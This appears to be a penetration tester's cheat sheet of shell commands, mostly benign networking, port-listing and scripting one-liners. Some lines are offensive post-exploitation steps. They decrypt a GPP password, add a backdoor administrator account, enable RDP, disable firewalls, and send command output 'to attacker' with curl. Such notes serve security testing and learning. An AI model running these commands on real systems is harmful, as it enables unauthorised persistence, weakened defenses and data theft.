Useful commands
Windows & AD
# Decrypt GPP AES-256 encrypted password
gpp-decrypt "+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE"
# Domain account policy
net accounts
# Add a local user and add it to administrators group
net user hunter Security@123 /add
net localgroup administrators hunter /add
# Enable RDP remote access.
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
# allow through firewall
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
# Turn Off Firewalls
netsh advfirewall set allprofiles state offTcpdump
# Filter output with the source, destination and port
sudo tcpdump -n src host 172.16.40.10 -r password_cracking_filtered.pcap
sudo tcpdump -n dst host 172.16.40.10 -r password_cracking_filtered.pcap
sudo tcpdump -n port 81 -r password_cracking_filtered.pcapPython
python3 -m venv .
source ./bin/activate
pip install aerospikeOpen Ports
# Linux
netstat -tulnp # Show with process IDs
netstat -anp | grep LISTEN # Filter for listening ports
ss -tulnp # Show with process info
# Windows cmd
netstat -an | find "LISTEN"
netstat -an | findstr LISTENING
netstat -ano # Show all with PID
# Windows PS
Get-NetTCPConnection | Where-Object {$_.State -eq "Listen"} | Select-Object LocalAddress, LocalPort
Get-NetUDPEndpoint | Select-Object LocalAddress, LocalPort # Show all active UDP portsOOB
# start upload server
python3 -m uploadserver 8080
# Send output of a command to attacker
command &> /tmp/output; curl --data @/tmp/output http://127.0.0.1:8080/upload
# monitor trafic on localhost port 8080
sudo tcpdump -nvvvXi lo tcp port 8080Automation
# Bash for loop
for line in $(cat "$1"); do echo "$line"; done
while IFS= read -r line; do echo "$line"; done < "$1"
# PS loop
Get-Content $args[0] | ForEach-Object { Write-Output $_ }
# Python for loop
import sys
with open(sys.argv[1]) as f:
for line in f:
print(line.strip())Last updated